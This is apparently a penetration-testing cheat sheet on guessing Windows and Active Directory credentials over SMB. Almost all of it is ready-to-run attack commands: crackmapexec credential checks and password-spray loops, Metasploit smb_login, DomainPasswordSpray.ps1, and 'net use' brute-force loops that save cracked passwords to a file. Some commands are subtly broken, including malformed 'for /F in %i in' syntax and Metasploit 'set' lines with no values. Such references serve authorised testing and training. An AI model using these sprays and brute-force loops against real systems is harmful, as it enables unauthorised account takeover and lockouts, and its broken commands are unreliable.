Use the SMB service to guess Windows related credentials. Especially usefull in an Active Directory environment.

Check Credentials

crackmapexec [HOST] -u [USERNAME] -p [PASSWORD] -d [DOMAIN]
Result Description
[+] PWNED Valid credentials and local administrator
[+] green Valid credentials
[-] red Invalid credentials (or other error)

You should get an smb: \> prompt in case of working credentials. Do not specify any username or password and leave the password blank or add the -N flag to authenticate with a null session.

Password Spray

Always be careful account lockout when performing password spray attacks in an Active Directory environment. See users enumeration techniques to get the list of all AD users and their failed password attempt count.

for user in $(cat users.txt); do crackmapexec [HOST] -u $user -p [PASSWORD] -d [DOMAIN]; done

All valid users will be automatically saved to the crackmapexec database. Use the creds command of the cmedb utility to display valid credentials.

Metasploit - smb_login
use auxiliary/scanner/smb/smb_login
set SMBDomain
set SMBPass

All valid users will be automatically saved to the workspace creds database.

PowerShell - DomainPasswordSpray.ps1

Automates the whole user enumeration and password spray process when run from whithin the domain.

Invoke-DomainPasswordSpray -Password [PASSWORD] -OutFile [VALID-CREDS.txt]

When using the -PasswordList option, it will attempt to gather the account lockout observation window from the domain and limit sprays to one per observation window to avoid locking out accounts.

Invoke-DomainPasswordSpray -PasswordList [PASSWORDS.txt] -OutFile [VALID-CREDS.txt]

Of course, the users list and domain name can also be specified manually.

Invoke-DomainPasswordSpray -Domain [DOMAIN] -UserList [USERS.txt] -Password [PASSWORD] -OutFile [VALID-CREDS.txt]


Brute Force

Native Windows - net use
for /F in %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && pause

Alternatively, we could append our result to a file:

for /F in %i in ([wordlist_file]) do @echo %i & @net use \\[targetIP] %i /u:[username] 2>nul && echo [username]: %i >> [output_file]